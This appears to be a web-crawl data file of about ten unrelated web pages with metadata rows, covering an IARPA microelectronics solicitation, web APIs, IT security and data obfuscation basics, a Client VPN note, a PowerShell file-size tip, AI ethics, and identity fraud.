With that in mind, the effort will be broken into two phases—A and B—with the first focused on developing initial proof-of-concept for proposals over nine months. Projects making it to Phase B will have 15 months to develop a working demo. IARPA has capped both phases at a combined total of $5 million.
Key to success will be thinking outside the traditional technological and scientific domains.
“Preference will be given to research with the ability to revolutionize hardware-software integration from material properties to hardware design, to system architecture, to software implementation,” the solicitation states. “Multidisciplinary approaches derived from life sciences, and/or inspired by artistic, anthropological, economical, and other non-traditional disciplines are welcome and encouraged.”
IARPA plans to make multiple awards for the first phase.
The effort has been divided into two topic areas for proposers to address:
Hardware, Software, Algorithm and Architecture Ecosystem
Approaches for improving the performance of AI applications in areas such as autonomous vehicles, biometrics, communications, position-navigation-timing, remote sensing, etc.
Research into optimizing the analytic performance of the hardware-software ecosystem in AI applications.
Research into tools, techniques or designs to improve the reliability and integrity of microelectronics hardware and/or hardware-software systems, to include defense or hardening supply chain, fabrication and/or computation performance against adversarial, malicious or quality control vulnerabilities.
New Science, Materials and Processing
Approaches derived from life and/or social sciences that might lead to significantly improve performance and reduce cost in the microelectronics used in AI applications.
Emerging research materials with controlled properties that can significantly improve the performance and reduce the cost of the microelectronics used in AI applications.
Novel approaches to the processing of the microelectronics—including fabrication, metrology and modeling—used in AI applications, which might lead to significant improvements in space, weight and power characteristics while reducing cost.
IARPA officials are accepting white papers—which are not required but “strongly encouraged”—by May 17. Based on those submissions, “formal proposals will then be encouraged or not encouraged,” the solicitation states, with the final deadline for proposal submission set for June 30.
“Proposals must explicitly address relevance of the technical approach to the future potential of Artificial Intelligence in the United States,” the solicitation states. “Proposals shall demonstrate that the proposed effort has the potential to make revolutionary, rather than incremental, improvements to current capabilities.”
Questions on the opportunity are due by 4 p.m. May 19. | <urn:uuid:e8528f3d-6a38-4396-8593-7ef5c68825c9> | CC-MAIN-2022-40 | https://www.nextgov.com/emerging-tech/2021/05/intel-community-needs-next-gen-microelectronics-future-ai/173766/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00766.warc.gz | en | 0.915185 | 930 | 2.75 | 3 |
Web APIs and web services are often interchangeable. So let’s distinguish between the two.
Web APIs are an evolution of web services.
Both facilitate information transfer, however web APIs are more dynamic than web services.
What is an API?
An API specifies how software components should interact with each other. It is a set of protocols and routines, with responses generally returned as JSON or XML data. APIs can use any type of communication protocol and are not limited in the same way a web service is.
What is a web service?
A web service is any piece of software that makes itself available over the internet and uses a standardized XML messaging system. XML is used to encode all communications to a web service.
How are they different and related?
By definition, a web service is any piece of software that makes itself available over the Internet and standardizes its communication via XML encoding. In contrast, a typical Web API specifies how software components should interact with each other using the web’s protocol (HTTP) as the go-between.
Now let’s discuss their similarity. APIs and web services have things in common; both web APIs and web services serve as a means of communication between consumers and providers. They also both support XML-based data payloads, while JSON is the more common payload type for web APIs. Last but not least, both Web APIs and web services are essentially a means to an end and the same problems can be solved by both. And they can be configured to operate over a network or within a machine.
About Incepta Solutions
At Incepta Solutions, our team of #InceptaInnovators is passionate about developing the bridge between people and operations, as we create stories that we can all be proud of.
Since our inception in 2010, we are recognized as trusted experts in providing digital services to global businesses. We are proud to be named one of the top 5 Information Technology companies in Canada on the Growth List 2020 (published by Canadian Business and MacLeans). In addition, we are humbled to be a certified Great Place to Work – Canada.
Our full suite of technology services includes:
Integration | Digital Transformation | Cybersecurity
Data Management | Cloud Strategy | Customer 360
At Incepta Solutions, we provide business solutions that solve challenges and enable future growth and success for our clients. We leverage industry-leading technologies to provide innovative solutions that are robust, of premier quality, and cost-effective.
In our growth journey, our goal is to become a global leader in digital transformation and enterprise solutions. We enable businesses all over the world to solve complex and critical integration challenges. As #InceptaInnovators, we hope to look back at these times on how we have helped global brands and enterprises achieve success. Our driving force is that one day, we are able to reflect on our shared journey and be proud of the stories we have created together. | <urn:uuid:e121ed8d-4a4e-4d6a-87f5-e25276655c0a> | CC-MAIN-2022-40 | https://www2.inceptasolutions.com/2021/06/16/difference-between-web-apis-and-web-services/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00766.warc.gz | en | 0.929922 | 606 | 2.84375 | 3 |
Confidentiality is about protecting sensitive and private information from unauthorized access. Integrity relates to protecting data from deletion or modification by unauthorized persons. Availability refers to the actual availability of company data.
Information Security relates to the different tools and processes your company uses specifically to protect any critical or sensitive business information.
Cybersecurity deals explicitly with protecting your business’s sensitive and critical data from cybercriminals. Although their malicious attempts usually occur over the internet, these attacks can also happen face-to-face.
Many companies believe that because they aren’t some large tech company or a severe government organization they’re unlikely targets of a cyberattack. In reality, the potential cyber threats to your company are real and prevalent. Just because you’re petite or don’t produce something you consider “high-value” doesn’t mean you’re safe.
Keep in mind that many cyberattacks, like phishing and malware, aren’t necessarily targeted. Instead, hackers send out mass emails or infect websites, knowing someone, somewhere will click the wrong link and infect their computer. We’ll go into greater detail on this point later in this article. Businesses that store large amounts of sensitive data would do well to ensure they follow best practices, as security breaches could result in highly costly business losses and legal penalties.
But even if such an outcome were not the case, to ignore the possibility of malicious attacks is to ignore the risk of your day-to-day operations abruptly shutting down for an unknown period of time. There’s also a risk that your internal and external business communications might be disrupted if your cloud applications’ security, or even your social media accounts, are compromised. Such breaches, especially those that divulge your users’ private information, could lead to significant reputational damage, loss of data, and an inevitable hit to your bottom line.
IT Security Threats
There are several significant threats to your business’s network security. If your company is to counter them, it’s important to understand these threats and how they work.
Weak Security Policies
If an unauthorized person wanted to access your network, this would be the most specific vulnerability to exploit.
Having unlocked or easily unlocked devices make for easy targets for this kind of threat, and even less than sophisticated hackers can take advantage of any weak company passwords. Organizations that fall prey to these threats generally have no password change policies in place, don’t require automatic device locking after inactivity, or have poor access control policies in place.
Web Browser Extensions
Although most appear to be benign, some web browser extensions have been compromised by cybercriminals in their attempt to gain access to the sensitive data of users, including web history, cookies, and even saved passwords.
As convenient as public wifi is, it comes with its concerns.
Public wifi networks are a common avenue that hackers use when attempting Man-in-the-Middle cyber attacks, which allow them to intercept your data that’s following through the public wifi connection. This is primarily a concern for employees that work remotely, as these workers often utilize cafes and other public locations for free wifi.
Phishing attacks are a form of social engineering that occurs when a cybercriminal attempts to trick you or your employees into giving up your private information via email, phone, in person, and now even through SMS communication. They accomplish this by posing as a legitimate brand or person that asks for your private information.
Malware is among the most popular and common threats to your business’s network. Defined simply, malware is malicious software, programs, or files deliberately placed on your network.
They go by many names, including trojan horses, viruses, spyware, etc. You may also encounter malware in the form of a Backdoor Attack, which refers to any method authorized or unauthorized users use to bypass standard security measures to gain access to your company’s network, software applications, or computer systems.
Ransomware is a type of malware that, once downloaded, immediately encrypts and prevents you from accessing your company’s systems and data until you pay a ransom.
Most come via suspicious emails that trick you into clicking nefarious links or downloading malware disguised as a regular attachment. You can also encounter them on questionable sites. Failing to properly update your browser, operating system, or installed software may also leave your business vulnerable to ransomware attacks. Remember that even after payment, there is no guarantee that the criminal will give you access to your captured data.
Unfortunately, the biggest security threat to your business is probably your employees.
For instance, the victims of phishing attacks are typically employees who were duped into clicking a suspicious link in an email. Of course, security breaches caused by employees are not always accidental. Sometimes employees are given a greater level of access to your company’s systems than necessary, which enables them to abuse their access privileges for personal gain. The simplest way to mitigate this issue is to set intelligent policies regarding employee data privileges and routinely educate your workforce on avoiding phishing attacks.
Unpatched Software & Hardware Vulnerabilities
As technology changes and ages, hackers eventually learn how to bypass old hardware and software security measures.
Because there are so many cybercriminals looking to exploit outdated security systems, one of the riskiest things your company can do is to dismiss the updates that pop up on your business devices and applications. Although it may be tempting to sleep an update to save an extra 5-10 minutes of your workday, doing so actually puts your company’s security at risk.
The best way to counter this risk is to maintain regular update schedules and have your IT team ensure that the latest security patches are being applied to company systems.
What Are the Types of IT Security?
You should generally be concerned with seven types: network, data, internet, data, cloud, application, and physical security.
Keep in mind that as networks and systems continue to integrate with the cloud and other emerging technologies, they will likely accommodate emerging threats to your security.
Network security relates to protecting the interaction of your company’s network and your devices through the use of a firewall–ideally a next-generation firewall.
This would protect your network from unauthorized access, unexpected malfunctions, misuse, destruction, modification, and improper disclosure of information.
Data security relates to protecting the actual files, data, and databases that house your company information.
Commonly used data security practices include encryption, tokenization, hashing, and key management.
Internet security is about making sure that any access to the internet is protected both out and in.
The purpose of this is to ensure that access to specific malicious sites or other nefarious web entities isn’t allowed entry to the network.
Internet security measures can be established inside the network or outside the network to accommodate employees that are roaming, traveling, or simply working remotely.
A simple example is when your employees use a VPN at a coffee shop instead of the publicly available wifi.
Endpoint security relates to protecting the endpoint device at your company workstations, although it can also include mobile devices’ security.
This type of security stops your company devices from being accessible to malicious networks that might compromise your business data’s safety.
Anti-virus software and device management software are standard practices of endpoint security.
Cloud security relates to protecting your company applications, data, and identities on the public cloud, thus not covered by your on-premise security stack.
Best practices involve using a cloud access security broker (CASB), a secure internet gateway (SIG), and cloud-based unified threat management (UTM) as a way of limiting who has access to your company's cloud networks.
Application security refers to protecting applications that your company is running, whether they be on-premise or in the cloud.
Application security makes sure that the data inside your company applications is secure and not open to unauthorized personnel.
The goal of application security is to limit access to your applications to relevant personnel. Even then, making sure that said person only has access to what they need, no more, no less.
Physical security involves setting up proper measures so that both employees and non-employees cannot steal company data, devices, hard drives, servers, etc.
Ensuring that server rooms are locked, giving only authorized personal keycards, and having a security watch for intruders goes a long way toward providing that company data doesn’t unexpectedly leave the premises.
Protecting Your Organization From IT Security Threats
Remote Work Policies
Make sure your company implements and educates your employees on remote work policies.
These include but are not limited to:
- Avoid public wifi-networks or encrypting your web connection.
- Make sure not to conduct work on personal computers.
- Remember to check that no one can see your screen if working with sensitive data.
- As an extra precautionary measure, using a USB data blocker when charging at public phone charging stations is often found at malls.
Data redundancy technically relates more to business continuity and disaster recovery (BCDR). However, it’s still relevant to address here as a response to specific incidents, particularly those relating to ransomware attacks.
In these situations, the criminal has control of your data, and there’s no guarantee you’ll be getting it back–but if your company implements data redundancy and has a backup or copy of the stolen data, you won’t need to worry so much about the ransom.
The next step would be to find out if compromised and to patch up the hole so that this incident doesn’t happen again.
Internet & Hardware Security
As mentioned earlier in the article, having your remote or off-premise employees use a VPN to connect to your business network is an excellent way to reinforce your business’s internet security.
For hardware security, remember to keep all company devices password-protected and set them to lock after an amount of inactivity.
To keep unauthorized users from bypassing your password protection, make sure to enable two-step verification.
Keep Up with Updates
Keeping relevant software applications updated means the applications run without issue, and security is up to date. Older applications are more susceptible to hacking.
Audit Your IT Security
Creating and implementing regular audits is the best way to track which strategies and practices are working and which need to either be improved or removed from your policies. The audits help you assess your company’s level of risk in a measurable way.
IT Security Policy Best Practices
Having policies that are too specific can end up needlessly restrictive, while creating policies that are too broad may not be secure enough; the secret is finding the right balance that fits your unique company’s needs.
Policies that restrict the sharing of passwords both inside and outside your organization, group policies in the IT department related to server access, and similar protocols are all things to keep in mind when developing or reviewing your policies.
The main thing to keep in mind with policies is to specify that all employees comply with your stated rules and guidelines.
Business managers typically achieve this by setting up acceptable use policies (AUPs), which stipulate the constraints and practices employees must agree to interact with your business’s network or internet.
Safeguard Your Business’s Future by Protecting Your Networks
Having your entire business on the internet makes it more easily accessible and scalable. Still, it also runs the risk of a hacker breaching your security and gaining access to critical information.
IT Security is what keeps your business safe as it continues to adapt to the modern era. To ensure that your own business stays prepared for potential threats, keep the lessons and best practices covered here in mind.
- What is IT Security? – the set of cybersecurity strategies your company uses to prevent unauthorized access to sensitive data and or critical resources, including data, devices, and networks.
- Cybersecurity vs. IT Security vs. Information Security – IT Security relates to the security of your business’s data via computer network security. Information security refers to the different tools and processes used to protect any critical or private business info. Cybersecurity deals with safeguarding sensitive business data from cyberattacks.
- Why is IT Security Important? – Cyberattacks and security breaches occur all the time, and most attacks are random, meaning that all businesses, even smaller mom and pop shops, are at risk. A breach of your private data can lead to reputational damage, financial loss, and disruption to business operations.
- IT Security Threats – weak security policies, compromised web browser extensions, unsecured public wifi, phishing attacks, ransomware, malware, and employees who accidentally or purposefully compromise your network security.
- Types of IT Security – network security, data security, internet security, endpoint security, cloud security, application security, and physical security.
- IT Security Best Practices – the use of remote work policies, applying data redundancy to mitigate damage in the event of a ransomware incident, implementing internet and hardware security, keeping up with software and application updates, auditing, and having a specific and manageable set of policies.
Maintaining Your Business’s IT Security
With everything that needs to be done, from the security audits to policy implementation, it can feel like one too many things to deal with on top of standard business operations.
Spend less time worrying about your security and more time running your business by taking advantage of our Managed Security Services, which come with preventative IT Security measures on top of our advanced threat detection and remediation solutions. | <urn:uuid:73ae09b3-d4aa-414c-ad7d-fcae4b13f1e3> | CC-MAIN-2022-40 | https://blog.commprise.com/en/understanding-it-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00766.warc.gz | en | 0.926719 | 2,860 | 2.953125 | 3 |
As data use has become ubiquitous in recent years, data breaches have followed suit. In 2021, the Identity Theft Resource Center recorded more than 1,800 instances of compromised data, a 68% increase over 2020 and 23% rise from the previous all-time high. By October of 2021, the total number of data breaches exceeded all of 2020, and the people affected by those breaches in the third quarter alone outnumbered the first two quarters combined.
The bottom line is that collecting, storing, and using data inherently introduces the risk of that data being compromised. To avoid imminent damages to an organization’s reputation, trustworthiness, and revenue, many are turning to data obfuscation to preserve data’s privacy and security.
In this blog, we look at what data obfuscation is, the benefits of using it, the most common techniques, and the capabilities data owners should look for when selecting a data obfuscation tool.
What Is Data Obfuscation?
Data obfuscation is the process of scrambling data to obscure its meaning, providing an added layer of protection against threats and malicious actors. By hiding the data’s actual value, data obfuscation renders it useless to attackers while retaining its utility for data teams, particularly in non-production environments.
For developers using potentially sensitive customer or company data to build and test applications in non-production environments, the ability to access quality data is critical. However, these non-production environments often do not have sufficient security perimeters or access controls in place – leaving data vulnerable to attack. Data obfuscation allows developers and testers to access realistic data, but since it no longer contains personally identifiable information (PII), they can do so without the concern of it being exploited.
The Benefits of Data Obfuscation
As noted above, one of the top benefits of data obfuscation is its ability to secure non-production environments and minimize risks when building new applications and programs. This is powerful for organizations looking to gain a competitive edge with innovative new technologies or product features.
Another primary benefit of obfuscating data is that it enables secure data sharing. In today’s global marketplace and increasingly connected world, sharing data both internally and externally is a key business driver, and has been linked to increased stakeholder engagement and enterprise value. The ability to obscure sensitive data makes it easier to securely share across lines of business or with third parties without risking unauthorized access.
Now more than ever, data sharing and data use more broadly must be compliant with an ever-growing list of regulatory requirements, data use agreements, and internal company rules. The EU’s General Data Protection Regulation (GDPR), for example, is quite strict about the use of personal data. Data obfuscation helps organizations overcome that potential hurdle by altering PII, thereby mitigating their risk of incurring fines or of any real damage should a breach occur.
Data obfuscation also enables self-service data access by allowing data teams to develop, test, analyze, and report on data, without having to jump through hoops to get the data needed to do so. This makes data supply chains more efficient by reducing the burden on IT and data engineering teams to manually respond to every data access request. Organizations can be confident that self-service data use doesn’t come at the expense of customers’, employees’, or users’ data privacy.
Data Obfuscation Techniques
With this foundational understanding of data obfuscation and its benefits, let’s look at three of the main techniques used to obfuscate data: data masking, data encryption, and data tokenization. Here, it’s worth pointing out that while encryption and tokenization are reversible (the original values can be derived from the obfuscated data), data masking is not.
Data masking is a data security measure that involves creating a fake but highly convincing version of an organization’s secure data. The idea is to protect data from breaches or leaks in instances where functional data sets are needed for demonstration, training, or testing, without revealing actual user data.
Essentially, data masking uses the same format as existing databases, but changes datas’ values. This process is done in such a way that the data cannot be reverse-engineered to reveal the original data points. Numbers and characters may be scrambled, hidden, substituted, or even encrypted.
Encryption can be thought of as a form of secret code, which scrambles the relevant information in a set of data and can only be reversed by assigned parties who possess the necessary encryption key. In asymmetric encryption, one public key and one private key are required to decrypt the data, while in symmetric encryption, just one private key is necessary for encryption and decryption. Either way, the data can’t be manipulated, analyzed, or used in any way until it’s decrypted.
Tokenization is a specific form of data masking where the replacement value, also called a “token,” has no extrinsic meaning to an attacker. Key segregation means that the key used to generate the token is separated from the pseudonymized data through process firewalls. The token is a new value that is meaningless in other contexts. Importantly, it’s not feasible for an attacker to make inferences about the original data from analysis of the token value.
Other Data Obfuscation Techniques
While the techniques cited above are the most common, others exist as well. Nulling, for example, replaces part of the data with null-valued variables, while blurring offsets the values of certain data by a predetermined amount. Meanwhile, as the name implies, randomization involves randomly reordering characters and numbers.
What to Look for in a Data Obfuscation Tool
When looking for the right tool to help you obfuscate your organization’s data, there are several factors to consider. Chief among them is whether or not the tool you’re considering has the right capabilities. Specifically, you’ll be best served with a tool that enables:
Sensitive Data Discovery and Classification
The best data obfuscation tools automatically scan cloud data sources, detect sensitive data, and generate standard tagging across multiple compute platforms. With sensitive data discovery, you can eliminate manual, error-prone processes and get universal data access control and visibility into your most sensitive data.
Attribute-Based Access Control
You’ll also want to ensure that your data obfuscation tool empowers your data teams to create automated policies to govern cloud data use. Dynamic attribute-based access control will allow you to scale user adoption, eliminate approval bottlenecks, and build trust with compliance and governance teams.
Being able to automate the data obfuscation techniques mentioned above is also important. Dynamic data masking and anonymization with mathematical guarantees can accelerate data sharing use cases, as well as enable data engineers and operations teams to automate data access control across your entire cloud data infrastructure at scale.
Data Policy Auditing
Finally, make sure that any data obfuscation tool you choose captures data policy enforcement in rich audit logs so that it’s easy for your data teams to keep track of data security compliance laws and regulations. This is critical for ensuring that obfuscation is working as intended, and can identify any suspicious activity immediately.
Immuta empowers data engineering and operations teams to automate data security, access control, and privacy protection. Our industry-leading automated data access solution offers data obfuscation capabilities to help any organization ensure its data use is secure, compliant with the latest regulatory requirements, and self-service for maximum efficiency.
To see how Immuta can simplify data masking and access control, start a free trial. | <urn:uuid:4b27a58e-6507-4aeb-b157-8fe2c40b42b8> | CC-MAIN-2022-40 | https://www.immuta.com/blog/data-obfuscation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00766.warc.gz | en | 0.896592 | 1,580 | 2.90625 | 3 |
Skip to main content
Client VPN Authentication Protocol
The Client VPN uses PAP as the authentication method. PAP authentication is always transmitted inside an IPsec tunnel between the client device and the MX security appliance using strong encryption. User credentials are never transmitted in clear text over the WAN or the LAN. An attacker sniffing on the network will never see user credentials because PAP is the inner-authentication mechanism used inside the encrypted IPsec tunnel.
- Last updated
Save as PDF | <urn:uuid:1f324c70-72b8-48e2-8598-b89fe0041d61> | CC-MAIN-2022-40 | https://documentation.meraki.com/MX/Client_VPN/Client_VPN_Authentication_Protocol | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00766.warc.gz | en | 0.86718 | 105 | 2.671875 | 3 |
Let's put what you've learned so far into practice using PowerShell's pipeline with objects.
- By Jeffery Hicks
We've covered a lot in the last few weeks, so now it's time to put some of what you've been learning to work in a relatively practical example. How about we try to figure out how much space files in %TEMP% are consuming?
First, you need to figure out what directory %TEMP% refers to. You can use the variable environmental PSDrive to return the directory by using $env:temp. Once you have that, a directory listing is the first step:
PS C:\> dir $env:temp -recurse
This lists the files and subfolders. The next step is to add up all of the file sizes. In other shells and languages, this may have meant parsing the directory output or keeping a running total going as each file was processed.
But in PowerShell, you're working with file objects, which have a length property that indicates their size. PowerShell also has a cmdlet that can do the measuring for you called, naturally, Measure-Object. In this example, you'll give it a property to measure and a parameter indicating that you want to calculate a sum based on that property:
PS C:\> dir $env:temp -rec | measure-object -property length -sum
Count : 26
Sum : 3192605
Property : length
That's not too bad and certainly helpful. But let's keep going. Measure-Object wrote an object to the pipeline with properties of Count, Average, Sum, Maximum and Minimum. If you only want to see the Sum property, you can refine your expression like this:
PS C:\> (dir $env:temp -rec | measure-object length -sum).sum
By enclosing the expression in parentheses, you're telling PowerShell to treat it as a single expression. This, in essence, is the object returned by Measure-Object, and all you need is the sum property. However, this value is in bytes. Maybe you want it in megabytes. That's simple -- divide by 1MB:
PS C:\> (dir $env:temp -rec | measure-object length -sum).sum/1mb
Finally, you may want to format that number. There are several ways to do that, but the easiest is to simply round the value to an integer by telling PowerShell to treat the entire value as type [int]:
PS C:\> (dir $env:temp -rec | measure-object length -sum).sum/1mb -as [int]
With one relatively simple line of PowerShell that leverages the pipeline and objects, you get a short and sweet answer.
Jeffery Hicks is an IT veteran with over 25 years of experience, much of it spent as an IT infrastructure consultant specializing in Microsoft server technologies with an emphasis in automation and efficiency. He is a multi-year recipient of the Microsoft MVP Award in Windows PowerShell. He works today as an independent author, trainer and consultant. Jeff has written for numerous online sites and print publications, is a contributing editor at Petri.com, and a frequent speaker at technology conferences and user groups. | <urn:uuid:10278e9f-abad-4f61-98a0-5bc903b70bce> | CC-MAIN-2022-40 | https://mcpmag.com/articles/2009/03/16/surfing-pipeline.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00766.warc.gz | en | 0.926695 | 701 | 3.03125 | 3 |
Nearly nine out of 10 organizations worldwide have encountered ethical issues resulting from the use of AI.
They are asking questions such as: What does a truly robust governance structure look like? What are the clear strategies around AI? Do these policies differ between countries?
At Capgemini, we believe that ethical values need to be integrated in the applications and processes we design, build, and use. Only then can we make AI systems that people can truly trust.
What is ‘Ethical’ AI?
According to the European Commission, AI ethics is an area calling for guidelines and enabling trustworthy AI projects that comply with fundamental rights, principles, and related core values, regardless of their specific nature.
Transparent AI: As AI increasingly influences our lives, firms must provide contextual information about how AI systems operate so that people understand how decisions are made and can identify errors more easily. What are the challenges facing us?
- Explainable AI: As more complex use cases are built; AI must be explained in language people can understand. Thought and design are needed in the explainability of decisions produced by AI tools. Explainability of AI is vital for customer reassurance and is increasingly required by regulators.
- Robust AI: As AI systems are already being given significant autonomous decision-making power in high-stakes situations, they must be resistant to risk, unpredictability, and volatility in real-world settings. One faulty application or misplaced goal could cause the system to take action with catastrophic consequences.
- Fair AI: Since AI systems learn what they know from training data, when these datasets inaccurately mirror society, reflect unfairness or institutional prejudice, those data biases can be replicated in the resulting AI systems. We need to ensure AI systems make recommendations that do not discriminate based on race, gender, religion, or other similar factors to ensure they are representative and achieve fair outcomes for all.
- Private AI: AI systems must comply with the privacy laws that regulate data collection, use, and storage and ensure that personal information is used in accordance with the privacy standards and protected from theft.
What are the solutions?
It is important to note that there is no one-size fits all solution when it comes to addressing ethics and trust in AI – these issues are challenging and not likely to remain static. Each use case must be evaluated independently, but there are guidelines and frameworks that can start things off in the right direction.
Trusted AI Framework
Organizations must take a pointed approach to making systems ethically fit for purpose. Capgemini recommends implementing our Trusted AI framework (model below), where trust and ethics should are addressed using dedicated setups, technological tools and frameworks.
1. A bias challenge
A bank wanted to check whether its algorithm, which predicts credit risk, was unfairly discriminating against people due to their gender, race, or socioeconomic background when granting loans. They wanted to make sure the model was not turning away potential clients who were perfectly solvent.
We developed an asset called Sustainable Artificial Intelligence assistant (SAIA). It recognizes, analyzes, and corrects bias throughout pre-processing, model building, and post-processing methods. SAIA can be applied to assess bias in different AI models.
An AI model that does not take these biases into account while accurately assessing credit risk, and a solution that is ethical, compliant in design, and used at the bank
2. An Explainability Challenge
One of our clients recycles titanium, but before recycling it they check the titanium chemical composition in the laboratory. The chemical composition determines how it can be mixed with other recycled titanium alloys. Our client wanted us to determine alloy usability based on its chemical composition – a high level of explainability was required here.
Based on historical data and simulations, Capgemini proposed a model to determine if an alloy is usable based on its chemical composition, and an optimization algorithm to find the best combinations of alloys. Using SHAP, a technique used in game theory to determine how much each player in a collaborative game has contributed to its success, we provided a visual, easy-to-understand list of factors that explained the estimated usability of an alloy based on a specific chemical element.
Accuracy rates of 90% were reached for the usability classification model, which allowed our client to resell unusable alloys and thus optimize stocks and save time. A very high level of explainability was achieved, giving experts a valuable AI advisory tool, full transparency, and control over the final recycle vs resell decisions. | <urn:uuid:8e79b97f-5e56-499c-8961-b08ceadd482d> | CC-MAIN-2022-40 | https://www.capgemini.com/ca-en/service/perform-ai/trusted-ai-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00766.warc.gz | en | 0.941264 | 931 | 2.96875 | 3 |
How do you know if your online activities are secure, or if trouble is lurking around the corner? IEEE has brought together its security expert members to evaluate the most substantial threats to personal information, and to advise the public on how to best protect against security compromises online.
All of the IEEE security experts polled cited malicious software, referred to as malware, and botnets, a group of automatic robots that infect a group of computers, as the chief security concerns for internet users. Malware includes things such as spyware and adware applications, as well as viruses and worms. These applications, once embedded in a computer, can track surfing habits of users and redirect searches, as well as send personal information, including passwords and credit card numbers, to a third party.
“The best rule when it comes to opening email attachments is if you don’t know the user, don’t trust it,” said Prof. Matthew Bishop, IEEE member and author of the textbook, Computer Security: Art and Science. “If you have any uncertainty, contact the sender offline to verify that the email and its attachment are both genuine. Even if your trusted friend sent you the email, they could unknowingly include a virulent attachment.”
Unfortunately, it’s impossible to be completely safe from fraud or identity theft online – or offline – today, but adopting some basic measures can reduce the risk when working online. It is important to ensure that your computer is updated with the latest software security fixes, both for the operating system and applications such as your antivirus tool, web browser and email software. Additionally, it’s imperative to know how to react if personal information is compromised.
“You need to think about what could happen if the information you provide to a merchant is stolen,” said Ulf Lindqvist, IEEE Computer Society member, and head of SRI International’s support for the U.S. Department of Homeland Security’s Cyber Security Research and Development Center. “For example, make sure you know how to report fraudulent charges to the issuer of your credit card, debit card, etc., and always check your statement at least once a month and preferably every week, to ensure that there are no questionable purchases included. If you see something suspicious, report it immediately.”
As social media sites continue to grow in popularity, they are also becoming breeding grounds for fraud. Malware and botnets are oftentimes disguised as a friendly exchange from someone in a person’s network, but can unknowingly have malicious information attached to otherwise genuine online personal communications. However, the main concern with sharing information on social networking sites is that it is impossible to know where the information is going to end up – regardless of its original destination.
“People need to realize that once information is uploaded to a social networking site, it never goes away,” said Edward Delp, IEEE Fellow and chair of the Information Forensics and Security Technical Committee of the IEEE Signal Processing Society. “Never put anything on these sites that you wouldn’t want your family, prospective employers or community to see – for years to come.”
As technology changes at an exponential rate and becomes more sophisticated, it is of paramount importance that security technologies keep pace with this development. Security protocols need to stay one step ahead to thwart attacks on potential system vulnerabilities. As an international organization of the world’s most prominent thought leaders on this topic, IEEE is working to bring these influential leaders together to help prevent, detect and solve security issues. | <urn:uuid:36289b43-0cf4-48f3-b1ad-8d0cd95190a1> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2009/11/11/how-to-protect-personal-information/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00766.warc.gz | en | 0.947676 | 729 | 2.9375 | 3 |
Thank you for Subscribing to CIO Applications Weekly Brief
Why AI is being Considered as the Technology of Past, Present, and Future?
Machine learning is being used by an increasing number of enterprises, meaning that AI goods and applications will increase fast shortly.
Fremont, CA: Artificial Intelligence (AI) has significantly influenced the corporate sector. What began as a rule-based automation system is now capable of simulating human interactions and behaviors. A powerful AI system exceeds human equivalents in terms of speed and capacity at a fraction of the cost. Thanks to technology breakthroughs, individuals are already connected to AI in some form, whether it is Siri or Alexa.
Even though machine learning is still in its early stages of development, more businesses are adopting it, signaling that AI goods and applications will rise fast in the near future.
Let's see how AI is progressing today:
The health sector recognizes the relevance of AI-powered technologies in next-generation healthcare technology. AI gets regarded to have the capacity to improve every area of healthcare operations and services. The potential economic benefits of AI in the healthcare industry, for example, are a significant driver of AI adoption.
Artificial intelligence-based innovation will be crucial in supporting individuals in preserving their well-being through continuous surveillance and coaching and assuring earlier diagnosis, individualized care, and more efficient reassessments.
Artificial intelligence (AI)-driven marketing uses technology to enhance the consumer experience. AI collects data on consumer sentiment, transactions, trips, and everything in between and utilizes it to construct machine learning and prediction algorithms on customer behavior.
The objective is to design customer acquisition and retention strategies by creating personalized content, suggestions, and communications. AI promises precise, rapid, adaptable, and human-like judgments that save money, enhance revenue and improve customer pleasure.
- Analyzing customer behavior
Humans cannot analyze all of the data generated by the internet, which may get utilized to forecast client behavior. In this instance, artificial intelligence is the best option, and it can provide companies with a wealth of data on company clients' tastes. Netflix is one of the best example of a company that uses machine learning algorithms to propose movies and shows to its customers. | <urn:uuid:c30ef184-bc37-4233-81be-8a6aa52e6857> | CC-MAIN-2022-40 | https://www.cioapplications.com/news/why-ai-is-being-considered-as-the-technology-of-past-present-and-future-nid-8993.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00166.warc.gz | en | 0.935554 | 457 | 2.765625 | 3 |
In a recent study conducted by Javelin Strategy and Research, it
reflected that identity fraud has increased 13% from 2011. One contributing
factor to this increase may be due to the number of online payments and Internet
fraud. As discussed in A
Faceless Society Needs KBA, more consumers are using online transactions
as a part of their daily routine. Whether it be online shopping, online
banking, or even taking polls and/or entering sweepstakes, if you are entering
your personal information online you run the risk of someone else accessing it.
In an infographic issued by CreditDonkey,
they help to illustrate the different types of identity fraud and give tips on
how to avoid it.
One way to help ensure the safety personal
information online is the use of ID
verification and authentication. Businesses who help to protect their
consumers information, such as financial institutions and online retailers,
need to consider partnering with an ID verification provider to strengthen
prevention measures. EVS helps to ensure that someone is who he or she
claims to be when entering information online. This helps to protect against
thieves using stolen personal information. ID verification and authentication
is the key to cutting down on identity theft online. As more companies
integrate this service into their security measures, consumers will be further
protected from online identity theft and Internet Fraud. | <urn:uuid:a80f56a5-b576-4822-9ce2-6b16733efa95> | CC-MAIN-2022-40 | https://www.electronicverificationsystems.com/blog/Identity-Fraud-on-the-Rise-from-2011 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00166.warc.gz | en | 0.885967 | 289 | 2.890625 | 3 |
